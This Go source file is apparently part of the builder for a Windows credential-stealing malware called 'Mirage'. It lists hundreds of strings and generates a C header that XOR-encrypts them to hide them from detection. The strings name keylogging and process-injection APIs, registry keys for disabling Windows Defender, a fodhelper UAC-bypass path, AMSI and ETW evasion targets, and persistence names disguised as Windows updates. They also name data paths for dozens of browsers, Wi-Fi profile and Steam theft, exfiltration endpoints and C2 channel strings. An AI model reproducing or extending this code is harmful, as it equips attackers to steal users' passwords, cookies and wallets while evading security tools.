package builder

import (
	"bytes"
	"fmt"
	"strings"
)

// stringEntry pairs a C identifier prefix with the plaintext string.
type stringEntry struct{ ID, Plain string }

// AllStrings is the master list — 508 entries ported from make_polymorphic.py.
var AllStrings = []stringEntry{
	{"ntdll", "ntdll.dll"},
	{"kernel32", "kernel32.dll"},
	{"advapi32", "advapi32.dll"},
	{"user32", "user32.dll"},
	{"rstrtmgr", "rstrtmgr.dll"},
	{"gdi32", "gdi32.dll"},
	{"ws2_32", "ws2_32.dll"},
	{"shell32", "shell32.dll"},
	{"crypt32", "crypt32.dll"},
	{"bcrypt", "bcrypt.dll"},
	{"ole32", "ole32.dll"},
	{"oleaut32", "oleaut32.dll"},
	{"ncrypt", "ncrypt.dll"},
	{"secur32", "secur32.dll"},
	{"FindFirstFileA", "FindFirstFileA"},
	{"FindNextFileA", "FindNextFileA"},
	{"FindClose", "FindClose"},
	{"CreateFileA", "CreateFileA"},
	{"ReadFile", "ReadFile"},
	{"WriteFile", "WriteFile"},
	{"CreateDirectoryA", "CreateDirectoryA"},
	{"GetFileAttributesA", "GetFileAttributesA"},
	{"CopyFileA", "CopyFileA"},
	{"DeleteFileA", "DeleteFileA"},
	{"MoveFileA", "MoveFileA"},
	{"GetEnvironmentVariableA", "GetEnvironmentVariableA"},
	{"SetWindowsHookExW", "SetWindowsHookExW"},
	{"CallNextHookEx", "CallNextHookEx"},
	{"UnhookWindowsHookEx", "UnhookWindowsHookEx"},
	{"GetKeyState", "GetKeyState"},
	{"GetForegroundWindow", "GetForegroundWindow"},
	{"GetWindowTextW", "GetWindowTextW"},
	{"GetAsyncKeyState", "GetAsyncKeyState"},
	{"MapVirtualKeyW", "MapVirtualKeyW"},
	{"GetKeyboardLayout", "GetKeyboardLayout"},
	{"ToUnicodeEx", "ToUnicodeEx"},
	{"GetTickCount64", "GetTickCount64"},
	{"GetTickCount", "GetTickCount"},
	{"GetDC", "GetDC"},
	{"ReleaseDC", "ReleaseDC"},
	{"CreateCompatibleDC", "CreateCompatibleDC"},
	{"DeleteDC", "DeleteDC"},
	{"CreateCompatibleBitmap", "CreateCompatibleBitmap"},
	{"SelectObject", "SelectObject"},
	{"BitBlt", "BitBlt"},
	{"GetDIBits", "GetDIBits"},
	{"DeleteObject", "DeleteObject"},
	{"OpenClipboard", "OpenClipboard"},
	{"CloseClipboard", "CloseClipboard"},
	{"GetClipboardData", "GetClipboardData"},
	{"GlobalLock", "GlobalLock"},
	{"GlobalUnlock", "GlobalUnlock"},
	{"EmptyClipboard", "EmptyClipboard"},
	{"SetClipboardData", "SetClipboardData"},
	{"GlobalAlloc", "GlobalAlloc"},
	{"RegOpenKeyExW", "RegOpenKeyExW"},
	{"RegCreateKeyExW", "RegCreateKeyExW"},
	{"RegSetValueExW", "RegSetValueExW"},
	{"RegDeleteKeyW", "RegDeleteKeyW"},
	{"RegCloseKey", "RegCloseKey"},
	{"RegQueryValueExW", "RegQueryValueExW"},
	{"RegOpenKeyExA", "RegOpenKeyExA"},
	{"RegQueryValueExA", "RegQueryValueExA"},
	{"CreateProcessA", "CreateProcessA"},
	{"VirtualAllocEx", "VirtualAllocEx"},
	{"WriteProcessMemory", "WriteProcessMemory"},
	{"CreateRemoteThread", "CreateRemoteThread"},
	{"OpenProcess", "OpenProcess"},
	{"GetModuleHandleA", "GetModuleHandleA"},
	{"GetModuleHandleW", "GetModuleHandleW"},
	{"GetProcAddress", "GetProcAddress"},
	{"LoadLibraryA", "LoadLibraryA"},
	{"HeapAlloc", "HeapAlloc"},
	{"HeapFree", "HeapFree"},
	{"HeapReAlloc", "HeapReAlloc"},
	{"GetProcessHeap", "GetProcessHeap"},
	{"GetComputerNameA", "GetComputerNameA"},
	{"GetDiskFreeSpaceExA", "GetDiskFreeSpaceExA"},
	{"GetCursorPos", "GetCursorPos"},
	{"GetKeyboardLayoutList", "GetKeyboardLayoutList"},
	{"GetSystemDefaultLangID", "GetSystemDefaultLangID"},
	{"GetTimeZoneInformation", "GetTimeZoneInformation"},
	{"LookupPrivilegeValueW", "LookupPrivilegeValueW"},
	{"AdjustTokenPrivileges", "AdjustTokenPrivileges"},
	{"OpenProcessToken", "OpenProcessToken"},
	{"GetSystemTimeAsFileTime", "GetSystemTimeAsFileTime"},
	{"GetFileSize", "GetFileSize"},
	{"SetFilePointer", "SetFilePointer"},
	{"SetFilePointerEx", "SetFilePointerEx"},
	{"FlushFileBuffers", "FlushFileBuffers"},
	{"MultiByteToWideChar", "MultiByteToWideChar"},
	{"WideCharToMultiByte", "WideCharToMultiByte"},
	{"GetLogicalDriveStringsW", "GetLogicalDriveStringsW"},
	{"QueryDosDeviceW", "QueryDosDeviceW"},
	{"CreateToolhelp32Snapshot", "CreateToolhelp32Snapshot"},
	{"Process32FirstW", "Process32FirstW"},
	{"Process32NextW", "Process32NextW"},
	{"GetSystemMetrics", "GetSystemMetrics"},
	{"CloseHandle", "CloseHandle"},
	{"FindWindowW", "FindWindowW"},
	{"GetWindowThreadProcessId", "GetWindowThreadProcessId"},
	{"DuplicateTokenEx", "DuplicateTokenEx"},
	{"ImpersonateLoggedOnUser", "ImpersonateLoggedOnUser"},
	{"RevertToSelf", "RevertToSelf"},
	{"VirtualAlloc", "VirtualAlloc"},
	{"RtlGetVersion", "RtlGetVersion"},
	{"WSAStartup", "WSAStartup"},
	{"WSACleanup", "WSACleanup"},
	{"socket", "socket"},
	{"connect", "connect"},
	{"send", "send"},
	{"recv", "recv"},
	{"closesocket", "closesocket"},
	{"getaddrinfo", "getaddrinfo"},
	{"freeaddrinfo", "freeaddrinfo"},
	{"inet_addr", "inet_addr"},
	{"htons", "htons"},
	{"NCryptOpenStorageProvider", "NCryptOpenStorageProvider"},
	{"NCryptOpenKey", "NCryptOpenKey"},
	{"NCryptDecrypt", "NCryptDecrypt"},
	{"NCryptFreeObject", "NCryptFreeObject"},
	{"BCryptOpenAlgorithmProvider", "BCryptOpenAlgorithmProvider"},
	{"BCryptCloseAlgorithmProvider", "BCryptCloseAlgorithmProvider"},
	{"BCryptSetProperty", "BCryptSetProperty"},
	{"BCryptGenerateSymmetricKey", "BCryptGenerateSymmetricKey"},
	{"BCryptDeriveKeyPBKDF2", "BCryptDeriveKeyPBKDF2"},
	{"BCryptDecrypt", "BCryptDecrypt"},
	{"BCryptDestroyKey", "BCryptDestroyKey"},
	{"BCryptCreateHash", "BCryptCreateHash"},
	{"BCryptHashData", "BCryptHashData"},
	{"BCryptFinishHash", "BCryptFinishHash"},
	{"BCryptDestroyHash", "BCryptDestroyHash"},
	{"BCryptGenRandom", "BCryptGenRandom"},
	{"CryptUnprotectData", "CryptUnprotectData"},
	{"CryptAcquireContextA", "CryptAcquireContextA"},
	{"CryptGenRandom", "CryptGenRandom"},
	{"CryptReleaseContext", "CryptReleaseContext"},
	{"SystemFunction036", "SystemFunction036"},
	{"CoInitializeEx", "CoInitializeEx"},
	{"CoCreateInstance", "CoCreateInstance"},
	{"CoSetProxyBlanket", "CoSetProxyBlanket"},
	{"CoUninitialize", "CoUninitialize"},
	{"AllocateAndInitializeSid", "AllocateAndInitializeSid"},
	{"CheckTokenMembership", "CheckTokenMembership"},
	{"FreeSid", "FreeSid"},
	{"CreateProcessW", "CreateProcessW"},
	{"RegDeleteValueW", "RegDeleteValueW"},
	{"WaitForSingleObject", "WaitForSingleObject"},
	{"ExitProcess", "ExitProcess"},
	{"VirtualFree", "VirtualFree"},
	{"VirtualFreeEx", "VirtualFreeEx"},
	{"CreateThread", "CreateThread"},
	{"Sleep", "Sleep"},
	{"GetCurrentProcess", "GetCurrentProcess"},
	{"GetCurrentProcessId", "GetCurrentProcessId"},
	{"GetLastError", "GetLastError"},
	{"TerminateProcess", "TerminateProcess"},
	{"GetCommandLineA", "GetCommandLineA"},
	{"GetModuleFileNameA", "GetModuleFileNameA"},
	{"GetTempPathA", "GetTempPathA"},
	{"GetLocalTime", "GetLocalTime"},
	{"GetFinalPathNameByHandleW", "GetFinalPathNameByHandleW"},
	{"SHGetFolderPathA", "SHGetFolderPathA"},
	{"LocalFree", "LocalFree"},
	{"ResumeThread", "ResumeThread"},
	{"GetExitCodeThread", "GetExitCodeThread"},
	{"InitializeCriticalSection", "InitializeCriticalSection"},
	{"DeleteCriticalSection", "DeleteCriticalSection"},
	{"EnterCriticalSection", "EnterCriticalSection"},
	{"LeaveCriticalSection", "LeaveCriticalSection"},
	{"WSASocketW", "WSASocketW"},
	{"accept", "accept"},
	{"bind", "bind"},
	{"listen", "listen"},
	{"setsockopt", "setsockopt"},
	{"getsockname", "getsockname"},
	{"htonl", "htonl"},
	{"ntohs", "ntohs"},
	{"SysAllocStringByteLen", "SysAllocStringByteLen"},
	{"SysFreeString", "SysFreeString"},
	{"SysStringByteLen", "SysStringByteLen"},
	{"CertFreeCertificateContext", "CertFreeCertificateContext"},
	{"CreateWindowExW", "CreateWindowExW"},
	{"RegisterClassW", "RegisterClassW"},
	{"DefWindowProcW", "DefWindowProcW"},
	{"DispatchMessageW", "DispatchMessageW"},
	{"GetMessageW", "GetMessageW"},
	{"TranslateMessage", "TranslateMessage"},
	{"PostMessageW", "PostMessageW"},
	{"DestroyWindow", "DestroyWindow"},
	{"PostQuitMessage", "PostQuitMessage"},
	{"wsprintfW", "wsprintfW"},
	{"WinExec", "WinExec"},
	{"VirtualProtect", "VirtualProtect"},
	{"NtAllocateVirtualMemory", "NtAllocateVirtualMemory"},
	{"NtClose", "NtClose"},
	{"NtCreateFile", "NtCreateFile"},
	{"NtCreateSection", "NtCreateSection"},
	{"NtCreateThreadEx", "NtCreateThreadEx"},
	{"NtDelayExecution", "NtDelayExecution"},
	{"NtFlushInstructionCache", "NtFlushInstructionCache"},
	{"NtFreeVirtualMemory", "NtFreeVirtualMemory"},
	{"NtGetNextProcess", "NtGetNextProcess"},
	{"NtMapViewOfSection", "NtMapViewOfSection"},
	{"NtOpenFile", "NtOpenFile"},
	{"NtOpenKey", "NtOpenKey"},
	{"NtOpenProcess", "NtOpenProcess"},
	{"NtProtectVirtualMemory", "NtProtectVirtualMemory"},
	{"NtQueryInformationProcess", "NtQueryInformationProcess"},
	{"NtQuerySystemInformation", "NtQuerySystemInformation"},
	{"NtQueryValueKey", "NtQueryValueKey"},
	{"NtReadVirtualMemory", "NtReadVirtualMemory"},
	{"NtSetInformationProcess", "NtSetInformationProcess"},
	{"NtTerminateProcess", "NtTerminateProcess"},
	{"NtWriteFile", "NtWriteFile"},
	{"NtWriteVirtualMemory", "NtWriteVirtualMemory"},
	{"CopyFileW", "CopyFileW"},
	{"CreateFileMappingA", "CreateFileMappingA"},
	{"DeleteFileW", "DeleteFileW"},
	{"FindFirstFileW", "FindFirstFileW"},
	{"FindNextFileW", "FindNextFileW"},
	{"GetClipboardSequenceNumber", "GetClipboardSequenceNumber"},
	{"GetEnvironmentVariableW", "GetEnvironmentVariableW"},
	{"GetModuleFileNameW", "GetModuleFileNameW"},
	{"GetTempPathW", "GetTempPathW"},
	{"LdrGetProcedureAddress", "LdrGetProcedureAddress"},
	{"LdrLoadDll", "LdrLoadDll"},
	{"MapViewOfFile", "MapViewOfFile"},
	{"MoveFileExW", "MoveFileExW"},
	{"RmEndSession", "RmEndSession"},
	{"RmGetList", "RmGetList"},
	{"RmRegisterResources", "RmRegisterResources"},
	{"RmStartSession", "RmStartSession"},
	{"UnmapViewOfFile", "UnmapViewOfFile"},
	{"reg_defender", "SOFTWARE\\\\Microsoft\\\\Windows Defender"},
	{"reg_mssettings", "Software\\\\Classes\\\\ms-settings"},
	{"reg_steam", "SOFTWARE\\\\Valve\\\\Steam"},
	{"reg_environment", "Environment"},
	{"boundary_mirage", "----MirageBoundary"},
	{"boundary_zialfi_chunk", "----ZialfiChunkBoundary7XkR9fL2"},
	{"boundary_zialfi_complete", "----ZialfiCompleteBoundary1Yz8Wk3P"},
	{"api_log", "/api/log"},
	{"api_log_chunk", "/api/log/chunk"},
	{"api_log_complete", "/api/log/complete"},
	{"github_api", "api.github.com"},
	{"github_releases_path", "/repos/{s}/{s}/releases/latest"},
	{"telegram_host", "t.me"},
	{"telegram_path", "/s/{s}"},
	{"persist_mirage_update", "MirageUpdate"},
	{"persist_windows_helper", "WindowsHelper.exe"},
	{"persist_windows_update", "WindowsUpdate"},
	{"persist_notepad", "notepad.exe"},
	{"wreg_defender", "SOFTWARE\\Policies\\Microsoft\\Windows Defender"},
	{"wreg_mssettings", "Software\\Classes\\ms-settings\\Shell\\Open\\Command"},
	{"wreg_windefend", "SYSTEM\\CurrentControlSet\\Services\\WinDefend"},
	{"wDisableAntiSpyware", "DisableAntiSpyware"},
	{"wStart", "Start"},
	{"wDelegateExecute", "DelegateExecute"},
	{"wfodhelper", "C:\\Windows\\System32\\fodhelper.exe"},
	{"wShell_TrayWnd", "Shell_TrayWnd"},
	{"wwinlogon", "winlogon"},
	{"wchrome_app_path", "\\Registry\\Machine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\chrome.exe"},
	{"wmirage_chrome", "mirage_chrome"},
	{"wLocalState", "\\Local State"},
	{"wLOCALAPPDATA", "LOCALAPPDATA"},
	{"wAPPDATA", "APPDATA"},
	{"wprofilesini", "\\profiles.ini"},
	{"RemoveDirectoryW", "RemoveDirectoryW"},
	{"bp_proc_0", "chrome"},
	{"bp_proc_1", "msedge"},
	{"bp_proc_2", "brave"},
	{"bp_proc_3", "opera"},
	{"bp_proc_4", "vivaldi"},
	{"bp_proc_5", "browser"},
	{"bp_proc_6", "amigo"},
	{"bp_proc_7", "torch"},
	{"bp_proc_8", "kometa"},
	{"bp_proc_9", "orbitum"},
	{"bp_proc_10", "iridium"},
	{"bp_proc_11", "dragon"},
	{"bp_proc_12", "slimjet"},
	{"bp_proc_13", "360se"},
	{"bp_proc_14", "fenrir"},
	{"bp_proc_15", "citrio"},
	{"bp_proc_16", "liebao"},
	{"bp_proc_17", "maxthon"},
	{"bp_proc_18", "kmeleon"},
	{"bp_proc_19", "avastbrowser"},
	{"bp_proc_20", "ccbrowser"},
	{"bp_proc_21", "ucbrowser"},
	{"bp_proc_22", "qqbrowser"},
	{"bp_proc_23", "superbird"},
	{"bp_proc_24", "sleipnir"},
	{"bp_proc_25", "atom"},
	{"bp_name_0", "Chrome"},
	{"bp_name_1", "Chrome (x86)"},
	{"bp_name_2", "Chrome SxS"},
	{"bp_name_3", "Edge"},
	{"bp_name_4", "Brave"},
	{"bp_name_5", "Opera"},
	{"bp_name_6", "Opera GX"},
	{"bp_name_7", "Vivaldi"},
	{"bp_name_8", "Yandex"},
	{"bp_name_9", "Chromium"},
	{"bp_name_10", "CentBrowser"},
	{"bp_name_11", "CocCoc"},
	{"bp_name_12", "Amigo"},
	{"bp_name_13", "Torch"},
	{"bp_name_14", "Kometa"},
	{"bp_name_15", "Orbitum"},
	{"bp_name_16", "7Star"},
	{"bp_name_17", "Sputnik"},
	{"bp_name_18", "Iridium"},
	{"bp_name_19", "Dragon"},
	{"bp_name_20", "Epic"},
	{"bp_name_21", "Uran"},
	{"bp_name_22", "Slimjet"},
	{"bp_name_23", "Chedot"},
	{"bp_name_24", "Elements Browser"},
	{"bp_name_25", "QIP Surf"},
	{"bp_name_26", "360Browser"},
	{"bp_name_27", "DCBrowser"},
	{"bp_name_28", "UR Browser"},
	{"bp_name_29", "Maple"},
	{"bp_name_30", "Fenrir"},
	{"bp_name_31", "Catalina"},
	{"bp_name_32", "Coowon"},
	{"bp_name_33", "Liebao"},
	{"bp_name_34", "Maxthon"},
	{"bp_name_35", "K-Melon"},
	{"bp_name_36", "Chrome Canary"},
	{"bp_name_37", "Chrome Dev"},
	{"bp_name_38", "Chrome Beta"},
	{"bp_name_39", "Edge Beta"},
	{"bp_name_40", "Edge Dev"},
	{"bp_name_41", "Edge Canary"},
	{"bp_name_42", "Brave Beta"},
	{"bp_name_43", "Brave Nightly"},
	{"bp_name_44", "Opera Beta"},
	{"bp_name_45", "Opera Crypto"},
	{"bp_name_46", "CryptoTab"},
	{"bp_name_47", "Avast Secure"},
	{"bp_name_48", "CCleaner"},
	{"bp_name_49", "UC Browser"},
	{"bp_name_50", "QQ Browser"},
	{"bp_name_51", "360 Browser"},
	{"bp_name_52", "Elements"},
	{"bp_name_53", "Superbird"},
	{"bp_name_54", "Sleipnir"},
	{"bp_name_55", "Mail.ru Atom"},
	{"bp_path_0", "Google\\\\Chrome\\\\User Data"},
	{"bp_path_1", "Google(x86)\\\\Chrome\\\\User Data"},
	{"bp_path_2", "Google\\\\Chrome SxS\\\\User Data"},
	{"bp_path_3", "Microsoft\\\\Edge\\\\User Data"},
	{"bp_path_4", "BraveSoftware\\\\Brave-Browser\\\\User Data"},
	{"bp_path_5", "Opera Software\\\\Opera Stable"},
	{"bp_path_6", "Opera Software\\\\Opera GX Stable"},
	{"bp_path_7", "Vivaldi\\\\User Data"},
	{"bp_path_8", "Yandex\\\\YandexBrowser\\\\User Data"},
	{"bp_path_9", "Chromium\\\\User Data"},
	{"bp_path_10", "CentBrowser\\\\User Data"},
	{"bp_path_11", "CocCoc\\\\Browser\\\\User Data"},
	{"bp_path_12", "Amigo\\\\User Data"},
	{"bp_path_13", "Torch\\\\User Data"},
	{"bp_path_14", "Kometa\\\\User Data"},
	{"bp_path_15", "Orbitum\\\\User Data"},
	{"bp_path_16", "7Star\\\\7Star\\\\User Data"},
	{"bp_path_17", "Sputnik\\\\Sputnik\\\\User Data"},
	{"bp_path_18", "Iridium\\\\User Data"},
	{"bp_path_19", "Dragon\\\\User Data"},
	{"bp_path_20", "Epic Privacy Browser\\\\User Data"},
	{"bp_path_21", "Uran\\\\User Data"},
	{"bp_path_22", "Slimjet\\\\User Data"},
	{"bp_path_23", "Chedot\\\\User Data"},
	{"bp_path_24", "Elements Browser\\\\User Data"},
	{"bp_path_25", "QIP Surf\\\\User Data"},
	{"bp_path_26", "360Browser\\\\Browser\\\\User Data"},
	{"bp_path_27", "DCBrowser\\\\User Data"},
	{"bp_path_28", "UR Browser\\\\User Data"},
	{"bp_path_29", "MapleStudio\\\\ChromePlus\\\\User Data"},
	{"bp_path_30", "Fenrir\\\\User Data"},
	{"bp_path_31", "CatalinaGroup\\\\Citrio\\\\User Data"},
	{"bp_path_32", "Coowon\\\\User Data"},
	{"bp_path_33", "Liebao\\\\User Data"},
	{"bp_path_34", "Maxthon5\\\\User Data"},
	{"bp_path_35", "K-Melon\\\\User Data"},
	{"bp_path_36", "Chrome SxS\\\\User Data"},
	{"bp_path_37", "Chrome Dev\\\\User Data"},
	{"bp_path_38", "Chrome Beta\\\\User Data"},
	{"bp_path_39", "Edge Beta\\\\User Data"},
	{"bp_path_40", "Edge Dev\\\\User Data"},
	{"bp_path_41", "Edge Canary\\\\User Data"},
	{"bp_path_42", "Brave-Browser-Beta\\\\User Data"},
	{"bp_path_43", "Brave-Browser-Nightly\\\\User Data"},
	{"bp_path_44", "Opera Software\\\\Opera Beta"},
	{"bp_path_45", "Opera Software\\\\Opera Crypto"},
	{"bp_path_46", "CryptoTab\\\\User Data"},
	{"bp_path_47", "Avast Secure Browser\\\\User Data"},
	{"bp_path_48", "CCBrowser\\\\User Data"},
	{"bp_path_49", "UCBrowser\\\\User Data"},
	{"bp_path_50", "QQBrowser\\\\User Data"},
	{"bp_path_51", "Superbird\\\\User Data"},
	{"bp_path_52", "Sleipnir\\\\User Data"},
	{"bp_path_53", "Mail.ru\\\\Atom\\\\User Data"},
	{"changeme", "changeme"},
	{"bp_stem_chrome", "chrome"},
	{"bp_stem_msedge", "msedge"},
	{"bp_stem_brave", "brave"},
	{"bp_stem_opera", "opera"},
	{"bp_stem_vivaldi", "vivaldi"},
	{"bp_stem_chromium", "chromium"},
	{"bp_stem_slimjet", "slimjet"},
	{"bp_stem_yandex", "yandex"},
	{"bp_stem_iron", "iron"},
	{"bp_stem_falkon", "falkon"},
	{"bp_stem_seamonkey", "seamonkey"},
	{"bp_stem_waterfox", "waterfox"},
	{"bp_stem_palemoon", "palemoon"},
	{"bp_stem_basilisk", "basilisk"},
	{"bp_cmp_edge", "Microsoft\\Edge"},
	{"bp_cmp_brave", "BraveSoftware"},
	{"bp_cmp_avast", "AVAST Software"},
	{"bp_cmp_yandex", "Yandex"},
	{"bp_cmp_chrome", "Chrome"},
	{"bp_kill_chrome", "chrome"},
	{"nt_dup_obj", "NtDuplicateObject"},
	{"nt_unmap_view", "NtUnmapViewOfSection"},
	{"wlanapi", "wlanapi.dll"},
	{"WlanOpenHandle", "WlanOpenHandle"},
	{"WlanEnumInterfaces", "WlanEnumInterfaces"},
	{"WlanGetProfileList", "WlanGetProfileList"},
	{"WlanGetProfile", "WlanGetProfile"},
	{"WlanFreeMemory", "WlanFreeMemory"},
	{"WlanCloseHandle", "WlanCloseHandle"},
	{"gecko_firefox_name", "Firefox"},
	{"gecko_firefox_path", "Mozilla\\Firefox\\Profiles"},
	{"gecko_firefox_proc", "firefox"},
	{"gecko_waterfox_name", "Waterfox"},
	{"gecko_waterfox_path", "Waterfox\\Profiles"},
	{"gecko_waterfox_proc", "waterfox"},
	{"gecko_palemoon_name", "Pale Moon"},
	{"gecko_palemoon_path", "Moon\\Profiles"},
	{"gecko_palemoon_proc", "palemoon"},
	{"gecko_seamonkey_name", "SeaMonkey"},
	{"gecko_seamonkey_path", "SeaMonkey\\Profiles"},
	{"gecko_seamonkey_proc", "seamonkey"},
	{"gecko_icedragon_name", "IceDragon"},
	{"gecko_icedragon_path", "Cyberfox\\Profiles"},
	{"gecko_icedragon_proc", "icedragon"},
	{"gecko_basilisk_name", "Basilisk"},
	{"gecko_basilisk_path", "Basilisk\\Profiles"},
	{"gecko_basilisk_proc", "basilisk"},
	{"gecko_kmeleon_name", "K-Meleon"},
	{"gecko_kmeleon_path", "K-Meleon\\Profiles"},
	{"gecko_kmeleon_proc", "kmeleon"},
	{"gecko_icecat_name", "GNU IceCat"},
	{"gecko_icecat_path", "IceCat\\Profiles"},
	{"gecko_icecat_proc", "icecat"},
	{"gecko_swiftweasel_name", "Swiftweasel"},
	{"gecko_swiftweasel_path", "Swiftweasel\\Profiles"},
	{"gecko_swiftweasel_proc", "swiftweasel"},
	{"gecko_floorp_name", "Floorp"},
	{"gecko_floorp_path", "Floorp\\Profiles"},
	{"gecko_floorp_proc", "floorp"},
	{"AmsiScanBuffer", "AmsiScanBuffer"},
	{"EtwEventWrite", "EtwEventWrite"},
	{"EtwEventWriteEx", "EtwEventWriteEx"},
	{"RtlAddVectoredExceptionHandler", "RtlAddVectoredExceptionHandler"},
	{"RtlRemoveVectoredExceptionHandler", "RtlRemoveVectoredExceptionHandler"},
	{"c2_prefix", "c2://"},
	{"mirage_c2_channel", "mirage_c2"},
	{"unisp_name_a", "UNISP_NAME_A"},
	{"saltysalt", "saltysalt"},
	{"steam_path_val", "SteamPath"},
	{"btc_addr", "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"},
	{"eth_addr", "0x0000000000000000000000000000000000000000"},
	{"ltc_addr", "ltc1qw508d6qejxtdg4y5r3zarvary0c5xw7kgmn4n9"},
	{"vpn_nordvpn", "NordVPN"},
	{"vpn_openvpn", "OpenVPN"},
	{"vpn_wireguard", "WireGuard"},
	{"vpn_surfshark", "SurfShark"},
	{"vpn_expressvpn", "ExpressVPN"},
	{"vpn_cyberghost", "CyberGhost"},
	{"vpn_pia", "PIA"},
	{"vpn_mullvad", "Mullvad"},
	{"vpn_windscribe", "Windscribe"},
	{"vpn_tunnelbear", "TunnelBear"},
	{"vpn_hotspotshield", "Hotspot Shield"},
	{"vpn_vyprvpn", "VyprVPN"},
	{"vpn_hamachi", "Hamachi"},
	{"vpn_hidemyname", "HideMyName"},
	{"vpn_ipvanish", "IPVanish"},
	{"vpn_radminvpn", "RadminVPN"},
	{"vpn_softether", "SoftEther"},
	{"vpn_protonvpn", "ProtonVPN"},
	{"kernelbase", "kernelbase.dll"},
	{"EtwEventWriteEx", "EtwEventWriteEx"},
	{"EtwEventWriteString", "EtwEventWriteString"},
	{"EtwTiSetProviderState", "EtwTiSetProviderState"},
	{"RtlUserThreadStart", "RtlUserThreadStart"},
	{"BaseThreadInitThunk", "BaseThreadInitThunk"},
	{"NtOpenSection", "NtOpenSection"},
	{"NtMapViewOfSection", "NtMapViewOfSection"},
	{"NtUnmapViewOfSection", "NtUnmapViewOfSection"},
	{"NtReadFile", "NtReadFile"},
	{"SystemFunction032", "SystemFunction032"},
	{"RtlLookupFunctionEntry", "RtlLookupFunctionEntry"},
	{"RtlAddFunctionTable", "RtlAddFunctionTable"},
}

func dedupList() []stringEntry { seen := make(map[string]bool); var out []stringEntry; for i := len(AllStrings)-1; i >= 0; i-- { if !seen[AllStrings[i].ID] { seen[AllStrings[i].ID] = true; out = append([]stringEntry{AllStrings[i]}, out...) } }; return out }

func GenerateEncStringsH(pc PolyConfig) string {
	var buf bytes.Buffer
	buf.WriteString("// Auto-generated by poly.go — DO NOT EDIT\n")
	buf.WriteString("// XOR-encrypted strings for .rdata obfuscation\n\n")
	buf.WriteString("#ifndef MIRAGE_ENC_STRINGS_H\n#define MIRAGE_ENC_STRINGS_H\n\n")
	buf.WriteString("#include <stdint.h>\n#include <stddef.h>\n#include \"config.h\"\n\n")
	buf.WriteString("static inline void enc_decrypt(const uint8_t *enc, size_t len, char *out) {\n")
	buf.WriteString("    for (size_t i = 0; i < len; i++)\n")
	buf.WriteString("        out[i] = (char)(enc[i] ^ MIRAGE_STRING_KEY_ENC[i % 16]);\n")
	buf.WriteString("    out[len] = '\\0';\n}\n\n")
	buf.WriteString("static inline void enc_decrypt_wide(const uint8_t *enc, size_t enc_len, wchar_t *out) {\n")
	buf.WriteString("    for (size_t i = 0; i < enc_len; i++)\n")
	buf.WriteString("        out[i] = (wchar_t)(enc[i] ^ MIRAGE_STRING_KEY_ENC[i % 16]);\n")
	buf.WriteString("    out[enc_len] = L'\\0';\n}\n\n")

	for _, s := range dedupList() {
		enc := pc.EncryptString(s.Plain)
		buf.WriteString(fmt.Sprintf("static const uint8_t enc_%s[%d] = {", s.ID, len(enc)))
		for i, b := range enc {
			if i > 0 { buf.WriteString(", ") }
			buf.WriteString(fmt.Sprintf("0x%02x", b))
		}
		buf.WriteString("};\n")
		buf.WriteString(fmt.Sprintf("#define ENC_%s_LEN %d\n\n", strings.ToUpper(s.ID), len(enc)))
	}
	buf.WriteString("#endif /* MIRAGE_ENC_STRINGS_H */\n")
	return buf.String()
}
